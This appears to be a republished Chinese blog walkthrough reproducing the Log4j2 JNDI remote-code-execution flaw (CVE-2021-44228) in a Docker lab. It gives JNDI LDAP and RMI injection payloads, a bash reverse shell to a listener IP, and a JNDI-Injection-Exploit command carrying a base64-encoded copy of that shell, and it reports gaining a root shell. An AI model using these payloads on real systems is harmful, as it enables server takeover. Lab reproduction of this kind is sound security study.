2021-log4j2漏洞復現CVE-2021-44228-反彈shell


2021-log4j2漏洞復現CVE-2021-44228

20211215

12:03

   

該漏洞是最近新爆出的漏洞能夠遠程執行 命令:

該鏡像本地可以搭建環境:

1、拉取一個docker鏡像 docker pull vulfocus/log4j2-rce-2021-12-09

2、跑起來docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

 

使用vulfocus可以搭建好環境:

訪問該鏈接:

http://vulfocus.fofa.so:42044/hello

之后POST傳入以下payload:

payload=${jndi:ldap://wdhcrj.dnslog.cn/exp}

回顯回來了內容dnslog:

本地搭建環境,將鏡像拉下來搭建好環境:

之后准備payload:

bash -i >& /dev/tcp/192.168.19.128/4444 0>&1

在kali/2021文件夾種有這個工具生成payload:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.19.128"

嘗試使用第一個payload:

payload=${jndi:rmi://192.168.19.128:1099/uctfqw}

再開一個終端可以回彈shell,有root權限:

  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM